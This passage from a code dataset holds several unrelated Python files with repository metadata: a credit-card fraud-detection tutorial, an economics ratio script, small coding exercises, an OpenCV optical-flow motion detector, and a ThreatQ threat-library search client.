get_preprocessed_df(df=None):\n df_copy = df.copy()\n # Log-transform Amount with numpy's log1p( ) \n amount_n = np.log1p(df_copy['Amount'])\n df_copy.insert(0, 'Amount_Scaled', amount_n)\n df_copy.drop(['Time','Amount'], axis=1, inplace=True)\n return df_copy\n\n\n# In[14]:\n\n\n# Notes on log1p and expm1 \n'''\nLog scale\n: when values differ by extreme orders of magnitude, taking the log makes them far easier to compare\nex_ x = 1,000,000 10,000 100 10 → plotted raw, everything except 1,000,000 gets squashed flat onto the floor\n log(x) = 6 4 2 1\nlog1p\n: uses log(1+x). Since log(1)==0, the 1+x keeps the log-scaled result from going negative. \n'''\nimport numpy as np\n\nprint(1e-1000 == 0.0)\n\nprint(np.log(1e-1000))\n\nprint(np.log(1e-1000 + 1))\nprint(np.log1p(1e-1000))\n\n\n# In[15]:\n\n\nvar_1 = np.log1p(100)\nvar_2 = np.expm1(var_1)\nprint(var_1, var_2)\n\n\n# In[16]:\n\n\nX_train, X_test, y_train, y_test = get_train_test_dataset(card_df)\n\nprint('### Logistic regression prediction performance ###')\nget_model_train_eval(lr_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n\nprint('### LightGBM prediction performance ###')\nget_model_train_eval(lgbm_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n\n\n# ### Train/predict/evaluate after removing outliers\n\n# ** Visualize the correlations between features and pick the ones most correlated with the class label **\n\n# In[21]:\n\n\nimport seaborn as sns\n\nplt.figure(figsize=(9, 9))\ncorr = card_df.corr() \n'''\ncorr() : correlation coefficient\nif column1 increases 1-2-3-4-5-6 and column2 increases 2-4-6-8-10-12 right along with it, they 'have a positive correlation with coefficient 1'\n\nmove exactly the same way -> corr() = 1\nmove exactly opposite -> corr() = -1 (still a ↑high↑ degree of correlation!!)\nsame direction, different degree -> a fraction, corr() = 0.~~\none changes while the other stays flat -> corr() = 0\n'''\nsns.heatmap(corr, cmap='RdBu') #\n'''\nVisualization: shows every pairwise feature correlation. \nRdBu : Red-down Blue-up. Each feature's corr() with itself is 1, so the diagonal is drawn in the deepest blue. \n\nIs any other column positively/negatively correlated with 'Class'?\n=> V14 and V17 show the strongest negative correlation!\n=> So removing outliers from those two should actually be worthwhile!\n'''\n\n\n# ** Create a function that filters the outlier rows in the DataFrame and returns their index. **\n\n# In[30]:\n\n\nimport numpy as np\n\ndef get_outlier(df=None, column=None, weight=1.5): #function that returns the outlier index\n # Take only the fraud rows of the column and get the 25% and 75% quantiles with np.percentile. \n fraud = df[df['Class']==1][column]\n quantile_25 = np.percentile(fraud.values, 25)\n quantile_75 = np.percentile(fraud.values, 75)\n \n # Compute the IQR, multiply it by 1.5, and derive the upper and lower fences. 
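\n # (Editor's worked example with made-up numbers: if Q1 = -10 and Q3 = -4\n # then IQR = 6 and 1.5*IQR = 9, so the fences are -10 - 9 = -19 and\n # -4 + 9 = 5; values outside [-19, 5] are treated as outliers.)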
\n iqr = quantile_75 - quantile_25\n iqr_weight = iqr * weight\n lowest_val = quantile_25 - iqr_weight\n highest_val = quantile_75 + iqr_weight\n \n # Use a boolean index to flag values above the upper fence or below the lower fence as outliers, and return only their DataFrame index. \n outlier_index = fraud[(fraud < lowest_val) | (fraud > highest_val)].index\n \n return outlier_index\n'''\n[Visualization - box plot]\noutliers : above the upper fence\nupper fence : Q3 + 1.5*IQR\nIQR : 3/4, Q3(75%) //IQR = Q3 - Q1, the spread between the quartile values\n 2/4, Q2(50%)\n 1/4, Q1(25%)\nlower fence : Q1 - 1.5*IQR\noutliers : below the lower fence\n'''\n\n\n# In[28]:\n\n\n#np.percentile(card_df['V14'].values, 100)\nnp.max(card_df['V14'])\n\n\n# In[31]:\n\n\noutlier_index = get_outlier(df=card_df, column='V14', weight=1.5)\nprint('Outlier data index:', outlier_index)\n\n\n# **Re-train/predict/evaluate the models after log-transforming and deleting the V14 outliers**\n\n# In[32]:\n\n\n# Change get_processed_df( ) to log-transform and then delete the outlier rows of the V14 feature. \ndef get_preprocessed_df(df=None):\n df_copy = df.copy()\n amount_n = np.log1p(df_copy['Amount'])\n df_copy.insert(0, 'Amount_Scaled', amount_n) #Amount_Scaled, same as before\n df_copy.drop(['Time','Amount'], axis=1, inplace=True)\n \n # Add the outlier-removal logic\n outlier_index = get_outlier(df=df_copy, column='V14', weight=1.5)\n df_copy.drop(outlier_index, axis=0, inplace=True) #axis=0 : row direction; drops the rows. \n return df_copy\n\nX_train, X_test, y_train, y_test = get_train_test_dataset(card_df)\n\nprint('### Logistic regression prediction performance ###')\nget_model_train_eval(lr_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n\nprint('### LightGBM prediction performance ###')\nget_model_train_eval(lgbm_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n'''\n[[85290 5]\n [ 25 121]]\naccuracy: 0.9996, precision: 0.9603, recall: 0.8288, F1: 0.8897, AUC:0.9780\n=> Recall: shoots up from the previous best of 0.7635 to 0.8288! FN dropped sharply. \n\nThat said, there are cases where deleting outliers makes things worse. It is all case by case. \n'''\n\n# ### Train/predict/evaluate after applying SMOTE oversampling\n\n# In[33]:\n\n\nfrom imblearn.over_sampling import SMOTE\n\nsmote = SMOTE(random_state=0)\nX_train_over, y_train_over = smote.fit_resample(X_train, y_train)\nprint('Train feature/label set before SMOTE: ', X_train.shape, y_train.shape)\nprint('Train feature/label set after SMOTE: ', X_train_over.shape, y_train_over.shape)\nprint('Label value distribution after SMOTE: \\n', pd.Series(y_train_over).value_counts())\n\n\n# In[34]:\n\n\nprint(y_train.value_counts())\n\n\n# ** Train/predict/evaluate with logistic regression **\n\n# In[35]:\n\n\nlr_clf = LogisticRegression()\n# Note that the ftr_train and tgt_train arguments change to the SMOTE-augmented X_train_over and y_train_over\nget_model_train_eval(lr_clf, ftr_train=X_train_over, ftr_test=X_test, tgt_train=y_train_over, tgt_test=y_test)\n'''\n[[82937 2358]\n [ 11 135]]\naccuracy: 0.9723, precision: 0.0542, recall: 0.9247, F1: 0.1023, AUC:0.9737\n=> Oversampling improved recall, but precision collapsed to 5%. Recall and precision always trade off, but this time it is extreme\n'''\n\n# ** Visualize the precision-recall curve **\n\n# In[36]:\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nfrom sklearn.metrics import precision_recall_curve\nget_ipython().run_line_magic('matplotlib', 'inline')\n\ndef precision_recall_curve_plot(y_test , pred_proba_c1):\n # Extract the threshold ndarray and the precision/recall ndarrays for those thresholds. \n precisions, recalls, thresholds = precision_recall_curve( y_test, pred_proba_c1)\n \n # Plot thresholds on the X axis and precision/recall on the Y axis. 
Precision is drawn as a dashed line\n plt.figure(figsize=(8,6))\n threshold_boundary = thresholds.shape[0]\n plt.plot(thresholds, precisions[0:threshold_boundary], linestyle='--', label='precision')\n plt.plot(thresholds, recalls[0:threshold_boundary],label='recall')\n \n # Change the scale of the threshold X axis to steps of 0.1\n start, end = plt.xlim()\n plt.xticks(np.round(np.arange(start, end, 0.1),2))\n \n # Set the x/y axis labels, the legend, and the grid\n plt.xlabel('Threshold value'); plt.ylabel('Precision and Recall value')\n plt.legend(); plt.grid()\n plt.show()\n \n\n\n# In[37]:\n\n\nprecision_recall_curve_plot( y_test, lr_clf.predict_proba(X_test)[:, 1] )\n#Plot recall and precision to see why precision is so low right now and what is going wrong with the logistic regression model.\n\n\n# ** Apply the LightGBM model!!!! **\n\n# In[38]:\n\n\nlgbm_clf = LGBMClassifier(n_estimators=1000, num_leaves=64, n_jobs=-1, boost_from_average=False)\nget_model_train_eval(lgbm_clf, ftr_train=X_train_over, ftr_test=X_test,\n tgt_train=y_train_over, tgt_test=y_test)\n'''\n[[85283 12]\n [ 22 124]]\naccuracy: 0.9996, precision: 0.9118, recall: 0.8493, F1: 0.8794, AUC:0.9814\n=> Training/predicting/evaluating the SMOTE-oversampled data with LightGBM,\n precision dips only slightly while recall climbs a lot. Both precision and recall are excellent!!\n=> Of course recall matters far more for a credit-card fraud model, but even so, the earlier 5% precision was unacceptable^^\n The card holder cannot get a \"Did you make this payment yourself?\" confirmation call every single time they swipe. Unusable in real life. \n'''\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kjeon0901/python-spider-machinelearning","sub_path":"python_code/ML_all_codes_per_chapters/4.9 분류 실습-신용카드_사기검출.py","file_name":"4.9 분류 실습-신용카드_사기검출.py","file_ext":"py","file_size_in_byte":17021,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31703718368","text":"#!/usr/bin/env conda run -n jpandas python\n# -*- coding: utf-8 -*-\n\nimport params\nimport pandas as pd\nfrom . import prd_funcs as func\n\n\ndef main(input_folder, output_folder):\n # read csv file\n file_cap = input_folder + 'post_cap.csv'\n file_GDP = input_folder + 'post_GDP.csv'\n df_cap = pd.read_csv(file_cap)\n df_GDP = pd.read_csv(file_GDP)\n\n # divide by 1000 to make the unit common.\n # GDP is in billions of yen\n # Capital is in millions of yen\n denom = 1000\n\n columns = ['tot_cap', 'prm_cap', 'non_prm_cap']\n for column in columns:\n df_cap[column] = df_cap[column] / denom\n\n # Change the data type to merge the data frames\n df_cap['year_jpn'] = df_cap['year_jpn'].astype(str)\n df_GDP['year_jpn'] = df_GDP['year_jpn'].astype(str)\n\n df = df_cap.merge(df_GDP, on='year_jpn').copy()\n\n alphaKA = params.alphaKA\n alphaKM = params.alphaKM\n\n df = func.create_cap_prd_ratio(df, alphaKA, alphaKM)\n df = func.create_cap_ratio(df)\n df = func.create_output_ratio(df)\n\n # Save the dataframe to a csv file\n file_name = 'post_cap_prd_ratio.csv'\n output = output_folder + file_name\n\n df.to_csv(output, index=False)\n\n\nif __name__ == '__main__':\n input_folder = '../../Data/Downloads/Post/'\n output_folder = ''\n main(input_folder, output_folder)\n","repo_name":"Satoshi-Matsuzawa/Wedge-Accounting","sub_path":"Python/Analysis/Production/post_cap_prd_ratio.py","file_name":"post_cap_prd_ratio.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34410732697","text":"# Count the duplicates:\n\n# Reports how many letters are duplicated in a string\n\ndef duplicate_count(text):\n text1 = text.lower()\n repeat = ''\n for i in text1:\n x = text1.count(i)\n if x >= 2:\n repeat += i\n else:\n continue\n return len(set(repeat))\n\nprint(duplicate_count(\"abcdeaB\"))\n\n# Better 
code:\n\"\"\"\nA list comprehension makes the code cleaner: here a list is built from the\nstring as a set, to get the unique letters, and the if check only adds the\nones that appear more than once. len counts how many there are.\nDropping the len also tells you which letters repeat.\n\"\"\"\n\ns = 'abcdeaB'\n\ndef duplicate_count(s):\n return len([i for i in set(s.lower()) if s.lower().count(i)>1])\n\n\n\n# Intermediate code before the final version\n\ny = [] # list of the repeated letters\n\nx = [i for i in set(s.lower()) if s.lower().count(i)>1]\nfor i in set(s.lower()): # the for iterates over the unique letters only\n if s.lower().count(i)>1: # this appends only the letters that occur more than once in the original string.\n y.append(i) # append to the list\n\nprint(y) # the repeated letters\nprint(len(y)) # how many repeated letters there are\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Usrg30/CodeWars","sub_path":"CodeWars_con_notas/ContarDuplicados.py","file_name":"ContarDuplicados.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11324283747","text":"def powersum(power,*args):\n '''Return the sum of each argument raised to the specified power.'''\n total=0\n for i in args:\n total+=pow(i,power)\n print(total)\n return total\n\npowersum(2,3,4)\npowersum(2,10)\n","repo_name":"StoneZhu2017/learning-python","sub_path":"Scripts/test_0813.py","file_name":"test_0813.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"25492473479","text":"import numpy as np\r\nimport cv2\r\n\r\ndef init_feature(cap): #initialize the feature points\r\n #set the feature-sampling parameters\r\n feature_params = dict( maxCorners = 100, qualityLevel =0.3, minDistance =7, blockSize =7)\r\n lk_params = dict(winSize = (15,15), maxLevel = 5, criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT,10,0.03))\r\n color = np.random.randint(0,255,(100,3)) #random colors\r\n \r\n ret, old_frame = cap.read() #read the video\r\n \r\n old_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY) #convert to grayscale\r\n \r\n \r\n x,y= old_gray.shape #get the frame size\r\n \r\n \r\n mask1 = np.zeros([x, y], dtype=np.uint8) #create the mask array\r\n mask1[50:300, 600:y-50] = 255 #set the feature-sampling region\r\n \r\n #cv2.imshow(\"mask1\", mask1) #show the mask\r\n #cv2.waitKey(0)\r\n\r\n old_gray1 = cv2.add(old_gray, np.zeros(np.shape(old_gray), dtype=np.uint8), mask=mask1)\r\n cv2.imshow(\"image\", old_gray1) #show the masked image\r\n #cv2.waitKey(0)\r\n \r\n p0 = cv2.goodFeaturesToTrack(old_gray1, mask =None, **feature_params) #grab the feature points\r\n #print(p0)\r\n mask = np.zeros_like(old_frame)\r\n #cap.release()\r\n \r\n return feature_params,lk_params,color,old_gray,p0,mask\r\n\r\n\r\ndef tracert_feature(cap,feature_params,lk_params,color,old_gray,p0,mask):\r\n count = 0\r\n \r\n \r\n while(1):\r\n \r\n \r\n ret,frame = cap.read()\r\n \r\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) \r\n p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)\r\n\r\n if st is not None:\r\n good_new = p1[st==1]\r\n good_old = p0[st==1]\r\n if st is None: #the feature points left the frame; re-capture them\r\n feature_params,lk_params,color,old_gray,p0,mask = init_feature(cap) \r\n tracert_feature(cap,feature_params,lk_params,color,old_gray,p0,mask)\r\n \r\n ''' \r\n #refresh the feature points\r\n if count > 120:\r\n #cap.release()\r\n print('Stop Move')\r\n count = 0\r\n move_flag = 0\r\n 
feature_params,lk_params,color,old_gray,p0,mask = init_feature(cap)\r\n #tracert_feature(cap,feature_params,lk_params,color,old_gray,p0,mask)\r\n ''' \r\n \r\n \r\n total_data_x = []\r\n total_data_y = []\r\n count_i = 1\r\n for i,(new,old) in enumerate(zip(good_new,good_old)):\r\n a,b = new.ravel()\r\n c,d = old.ravel()\r\n #print(str(i)+',a-c')\r\n #print(a-c)\r\n #print(str(i)+',b-d')\r\n #print(b-d)\r\n count_i +=1\r\n total_data_x.append((a-c))\r\n total_data_y.append((b-d))\r\n mask = cv2.line(mask, (a,b),(c,d),color[i].tolist(),2) #draw the motion-trail line\r\n frame = cv2.circle(frame,(a,b),5,color[i].tolist(),-1) #draw the feature point\r\n \r\n #print('X Value: '+str(total_data_x/count_i))\r\n #print('Y Value: '+str(total_data_y/count_i))\r\n if len(total_data_x) > 0:\r\n x_mean = sum(total_data_x)/len(total_data_x)\r\n y_mean = sum(total_data_y)/len(total_data_y)\r\n\r\n img = cv2.add(frame,mask) #overlay the feature motion trails\r\n \r\n if (x_mean) > 0.05 and st is not None:\r\n print('Move forward')\r\n cv2.putText(img,'Move forward',(500, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n \r\n if (y_mean) < -3.9 and (x_mean) < 0.05 and st is not None:\r\n print('Turn left')\r\n cv2.putText(img,'Move forward',(500, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n cv2.putText(img,'Turn left',(500, 250), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n print('y value:'+str(y_mean))\r\n\r\n if (y_mean) > -2.5 and (x_mean) < 0.05 and st is not None:\r\n print('Turn right')\r\n cv2.putText(img,'Move forward',(500, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n cv2.putText(img,'Turn right',(500, 250), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n print('y value:'+str(y_mean))\r\n \r\n if (x_mean) < 0.01 and x_mean > -0.01 and (y_mean) < 0.01 and st is not None and (x_mean) != 0:\r\n print('Stop Move')\r\n cv2.putText(img,'Stop Move',(500, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n print('x value:'+str(x_mean))\r\n cv2.putText(img,'x value:'+str((x_mean)) ,(500, 300), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n cv2.putText(img,'y value:'+str((y_mean)) ,(500, 350), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n\r\n \r\n \r\n cv2.imshow('frame',img)\r\n k = cv2.waitKey(30) & 0xff\r\n if k ==27:\r\n break\r\n \r\n old_gray = frame_gray.copy()\r\n p0 = good_new.reshape(-1,1,2)\r\n count +=1\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n cap = cv2.VideoCapture('./2021-10-26_14-00-14-front.mp4')\r\n feature_params,lk_params,color,old_gray,p0,mask = init_feature(cap)\r\n tracert_feature(cap,feature_params,lk_params,color,old_gray,p0,mask) \r\n cv2.destroyAllWindows()\r\n \r\n ","repo_name":"WilliamLin43/AITMA","sub_path":"vedio_detect.py","file_name":"vedio_detect.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11143182316","text":"import sys\nimport json\nimport requests\nimport logging\n\nfrom copy import copy, deepcopy\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nstring_types = (str,)\nif sys.version_info < (3,):\n string_types += (unicode,)\n\n\nclass ThreatLibrary(object):\n \"\"\"\n Executes a search using ThreatQ's Threat Library endpoints\n \"\"\"\n\n default_query = {\n \"name\": None,\n \"json\": {\n \"ui_query\": {\n \"columns\": {},\n \"criteria\": {},\n \"filters\": {},\n \"objects\": {\n \"current\": \"indicators\",\n \"selected\": []\n },\n \"filter_sets\": [\n {\n 
\"id\": 0,\n \"operator\": \"+or\",\n \"expanded\": True\n }\n ]\n },\n \"api_query\": {\n \"criteria\": {},\n \"filters\": {}\n }\n }\n }\n\n def __init__(self, tq, fields=None):\n \"\"\"\n Instantiates a ThreatLibrarySearch object\n\n Parameters:\n - tq (Threatq): A ThreatQ connection object\n - object_type (str): The object type you want to execute the query on\n - fields (list): List of fields to return from the Threat Library\n - load_objects (bool): Whether or not to dynamically load in objects, types, and statuses\n \"\"\"\n\n self.tq = tq\n self.saved_search = {}\n self.total = 0\n self.fields = fields or []\n self.date_injected = False\n\n # Object data\n self.object_list = []\n self.object_types = {}\n self.object_statuses = {}\n\n # Load object data from the ThreatQ instance\n self._load_object_list()\n\n def create_search_hash(self, mentions=None, json_data=None):\n \"\"\"\n DEPRECATED: This is only here for backwards compatible-ness\n\n Parameters:\n - mentions (str): Comma-separated list of values to search for keywords on\n - json_data (dict): The exact JSON data to be sent to the API to create a search\n \"\"\"\n\n return self.create_search(keywords=mentions, api_query=json_data)\n\n def create_search(self, name=None, keywords=None, api_query=None):\n \"\"\"\n Creates a Threat Library search\n\n Parameters:\n - name (str): A name for the search. If none provided, it will not be \"saved\" officially\n - keywords (list): A list of keywords to search for\n - api_query (dict): A pre-generated API query to use\n \"\"\"\n\n if not keywords and not api_query:\n raise ValueError('You must include either a \"keywords\" or \"api_query\" parameter')\n\n if isinstance(keywords, string_types):\n keywords = keywords.split(',')\n\n body = copy(self.default_query)\n body['name'] = name\n\n if keywords:\n # Build criteria\n ui_items = []\n api_items = []\n for item in keywords:\n api_items.append({\"mentions\": item.strip()})\n ui_items.append({\n 'key': 'mentions',\n 'value': item.strip(),\n 'set_id': 0\n })\n\n # Set UI query\n body['json']['ui_query']['criteria'] = {\n 'matchType': {'0': '+or'},\n 'items': ui_items\n }\n\n # Set API query\n body['json']['api_query']['criteria'] = {\"+or\": api_items}\n elif api_query:\n body['json']['api_query'] = api_query\n\n queries = self.tq.post('api/search/query', data=body)\n if queries and queries.get('data'):\n self.saved_search = queries['data']\n\n return self\n\n def get_saved_search(self, name):\n \"\"\"\n Gets the saved search data by name\n\n Parameters:\n - name (str): The name of the saved search to get\n \"\"\"\n\n queries = self.tq.get('api/search/query')\n if not queries or 'data' not in queries:\n raise ValueError('ThreatQ saved search query did not return any results')\n\n results = [x for x in queries['data'] if x['name'] == name]\n if not results:\n raise ValueError('No saved searches match the name provided')\n\n self.saved_search = results[0]\n\n # Load the search query from the response\n search = self.saved_search.get('json')\n if not search:\n raise ValueError(\"Search did not contain any criteria!\")\n\n # If the query is stringified, load it as a JSON object\n if isinstance(search, string_types):\n search = json.loads(search)\n\n # Set the query to the true JSON object\n self.saved_search['json'] = search\n return self\n\n def execute(self, object_type, custom_query={}, page_limit=1000,\n page_offset=0, max_results=None, yield_batches=False, fields=[]):\n \"\"\"\n Executes a query against the Threat Library and passes each 
batch to the caller to handle\n\n Parameters:\n - object_type (str): The object type within the ThreatQ system\n - custom_query (dict): The query to execute. Will override the saved search\n - page_limit (int): The max amount of results per-page\n - page_offset (int): The result offset to start paging from\n - max_results (int): The max amount of results to return (this is a hard stop)\n - yield_batches (bool): Whether to yield whole result batches instead of single items\n - fields (list): Fields to request for each result\n \"\"\"\n\n search = {}\n self.total = 0 # Reset the total count\n\n # Make sure a saved search exists or they're overriding it with a custom query\n if not custom_query and not self.saved_search:\n raise ValueError('You cannot execute a search without a JSON query')\n\n # Parse the JSON payload if using a saved search\n if custom_query:\n search = custom_query.get('api_query', custom_query)\n else:\n search = self.saved_search['json']\n\n # Match the passed object type to one from ThreatQ\n api_name = self._match_api_name(object_type)\n if not api_name:\n raise ValueError(\"Object type [{}] does not exist in ThreatQ!\".format(object_type))\n\n # Sanitize the payload by stripping out criteria\n # on objects that don't have certain properties\n payload = self.sanitize_payload(api_name, search)\n\n # If there is already an API query or manual query, use that\n if 'api_query' in payload or custom_query:\n payload = payload.get('api_query', payload)\n\n # Add in the fields\n payload['fields'] = fields or self.fields\n logger.debug('Executing [{}] Query: {}'.format(api_name, json.dumps(payload)))\n\n # paginate through results\n total = -1\n offset = page_offset\n while total == -1 or (offset < total and offset < max_results):\n params = {'limit': page_limit, 'offset': offset}\n res = {}\n\n try:\n res = self.tq.post('api/{}/query'.format(api_name), params=params, data=payload)\n except requests.exceptions.ConnectionError:\n logger.warning(\"BadStatusLine Error. 
Continuing...\")\n continue # Retry request\n\n if not res or 'data' not in res:\n raise ValueError('ThreatQ Threat Library Search for {} returned no data.'.format(api_name))\n\n # Store values for pagination\n offset += len(res['data'])\n\n # Set the total results\n self.total = res['total']\n\n # Handle \"first page\" stuff\n if total == -1:\n total = res['total']\n logger.debug('Threat Library search found {} total results'.format(total))\n max_results = total if not max_results else max_results\n\n ret = [item for item in res['data'] if item]\n if yield_batches:\n yield ret\n else:\n for i in ret:\n yield i\n\n def sanitize_payload(self, object_type, payload):\n \"\"\"\n Remove any unused payload filters, per-object type\n\n Parameters:\n - object_type (str): The object code for the payload\n - payload (dict): The search payload\n \"\"\"\n\n payload = deepcopy(payload)\n\n # Remove typename\n if object_type not in self.object_types.keys():\n Utils.strip_keys(payload, keys=['types', 'type_name'])\n else:\n # Make sure we are only querying for types that apply to the object\n values = Utils.get_key_values(payload, 'type_name')\n for val in values:\n if val not in self.object_types.get(object_type, []):\n Utils.strip_key_value(payload, 'type_name', val)\n\n # Remove status name\n if object_type not in self.object_statuses.keys():\n Utils.strip_keys(payload, keys=['statuses', 'status_name'])\n else:\n # Make sure we are only querying for types that apply to the object\n values = Utils.get_key_values(payload, 'status_name')\n for val in values:\n if val not in self.object_statuses.get(object_type):\n Utils.strip_key_value(payload, 'status_name', val)\n\n # Remove score\n if object_type not in ['indicators']:\n Utils.strip_keys(payload, keys=['score'])\n\n # Remove empty items\n rem = None\n while rem is None or rem != 0:\n rem = Utils.strip_empty(payload, ignore=['filters', 'criteria'])\n\n return payload\n\n def inject_date(self, start_date, end_date=\"NOW\", date_type='created_at'):\n \"\"\"\n Injects a date into the payload\n\n Parameters:\n - start_date (str): A string representation of a start date, or a laravel relative date\n - end_date (str): A string representation of an end date, or a laravel relative date\n - date_type (str): The date type to inject\n \"\"\"\n\n # Load the search JSON\n search_json = self.saved_search['json']\n\n # List of possible dates in search\n date_types = ['created_at', 'updated_at', 'touched_at']\n\n if 'api_query' not in search_json:\n raise ValueError(\"Cannot inject date into search without an API query\")\n\n # Detect the 'key' to inject into. Either criteria or filters. 
Default to criteria\n field = 'criteria'\n if search_json['api_query'].get('filters'):\n field = 'filters'\n\n # Copy the filters and make sure that it has an \"+and\" list\n filters = copy(search_json['api_query'][field])\n if not filters:\n filters = {}\n if '+and' not in filters:\n filters['+and'] = []\n\n # Remove other dates from the \"+and\" filter list\n for f in range(len(filters['+and'])):\n for k, v in filters['+and'][f].items():\n if k in date_types:\n del filters['+and'][f][k]\n\n # Inject new date\n filters['+and'].append({\n date_type: {\n \"+gt\": start_date,\n \"+lt\": end_date\n }\n })\n\n # Set the new JSON with injected date\n self.saved_search['json']['api_query'][field] = filters\n self.date_injected = True\n\n def _match_api_name(self, value):\n \"\"\"\n Matches an input to an API name\n \"\"\"\n\n if not self.object_list:\n raise ValueError(\"No ThreatQ object data loaded!\")\n\n c_val = Utils.standardize_value(value)\n\n for obj_data in self.object_list:\n if (\n Utils.standardize_value(obj_data['collection']) == c_val or\n Utils.standardize_value(obj_data['display_name']) == c_val or\n Utils.standardize_value(obj_data['display_name_plural']) == c_val\n ):\n return obj_data['collection']\n\n def _load_object_list(self):\n \"\"\"\n Loads in objects and types from ThreatQ\n \"\"\"\n\n # Get objects\n ignore = ['objectlinks', 'investigations']\n data = self.tq.get('/api/objects').get('data', [])\n if not data:\n raise ValueError(\"Failed to get objects from ThreatQ!\")\n\n # Get list of objects and filter out ones we want to ignore\n self.object_list = [val for val in data if val['collection'] not in ignore]\n\n # Fill out object data\n for obj in self.object_list:\n api_name = obj['collection']\n\n if 'types' in obj and len(obj['types']) > 0:\n if api_name not in self.object_types:\n self.object_types[api_name] = []\n for type_data in obj['types']:\n if type_data['name'] not in self.object_types[api_name]:\n self.object_types[api_name].append(type_data['name'])\n\n if 'statuses' in obj and len(obj['statuses']) > 0:\n if api_name not in self.object_statuses:\n self.object_statuses[api_name] = []\n for status_data in obj['statuses']:\n if status_data['name'] not in self.object_statuses[api_name]:\n self.object_statuses[api_name].append(status_data['name'])\n\n\nclass Utils:\n\n @staticmethod\n def strip_keys(input_data, keys=[], key_ends=[], skip=[]):\n \"\"\"\n Removes items from input\n \"\"\"\n\n if isinstance(input_data, dict):\n for key in list(input_data.keys()):\n if key in keys and key not in skip:\n del input_data[key]\n elif any(key.endswith(k) for k in key_ends) and key not in skip:\n del input_data[key]\n elif isinstance(input_data[key], list) or isinstance(input_data[key], dict):\n Utils.strip_keys(input_data[key], keys=keys, key_ends=key_ends, skip=skip)\n elif isinstance(input_data, list):\n for i in reversed(range(len(input_data))):\n Utils.strip_keys(input_data[i], keys=keys, key_ends=key_ends, skip=skip)\n else:\n pass\n\n @staticmethod\n def strip_empty(input_data, ignore=[]):\n \"\"\"\n Removes items from input\n \"\"\"\n\n total = 0\n\n if isinstance(input_data, dict):\n for key in list(input_data.keys()):\n if isinstance(input_data[key], list) or isinstance(input_data[key], dict):\n if key not in ignore and not input_data[key]:\n del input_data[key]\n total += 1\n else:\n total += Utils.strip_empty(input_data[key], ignore=ignore)\n elif isinstance(input_data, list):\n for i in reversed(range(len(input_data))):\n if not input_data[i]:\n del 
input_data[i]\n total += 1\n else:\n total += Utils.strip_empty(input_data[i], ignore=ignore)\n else:\n pass\n\n return total\n\n @staticmethod\n def get_key_values(input_data, key):\n \"\"\"\n Collects every value stored under the given key\n \"\"\"\n\n values = []\n\n if isinstance(input_data, dict):\n for k in list(input_data.keys()):\n if isinstance(input_data[k], list) or isinstance(input_data[k], dict):\n values.extend(Utils.get_key_values(input_data[k], key))\n elif key == k:\n values.append(input_data[k])\n elif isinstance(input_data, list):\n for i in reversed(range(len(input_data))):\n values.extend(Utils.get_key_values(input_data[i], key))\n else:\n pass\n\n return values\n\n @staticmethod\n def strip_key_value(input_data, key, value):\n \"\"\"\n Removes entries that match the given key/value pair\n \"\"\"\n\n if isinstance(input_data, dict):\n for k in list(input_data.keys()):\n if isinstance(input_data[k], list) or isinstance(input_data[k], dict):\n Utils.strip_key_value(input_data[k], key, value)\n elif key == k and input_data[k] == value:\n del input_data[k]\n elif isinstance(input_data, list):\n for i in reversed(range(len(input_data))):\n Utils.strip_key_value(input_data[i], key, value)\n else:\n pass\n\n @staticmethod\n def standardize_value(value):\n \"\"\"\n Strips characters out of a string to standardize it\n \"\"\"\n\n if not value:\n return value\n\n value = value.replace('_', '')\n value = value.replace(' ', '')\n value = value.replace('-', '')\n value = value.strip()\n return value.lower()\n","repo_name":"netskopeoss/ta_cloud_exchange_plugins","sub_path":"tq_mw_netskope/lib/threatqsdk/threat_library.py","file_name":"threat_library.py","file_ext":"py","file_size_in_byte":16789,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"3564443566","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union\n\nfrom attrs import define as _attrs_define\nfrom attrs import field as _attrs_field\n\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.model_cloud_node_account_register_resp_data import ModelCloudNodeAccountRegisterRespData\n\n\nT = 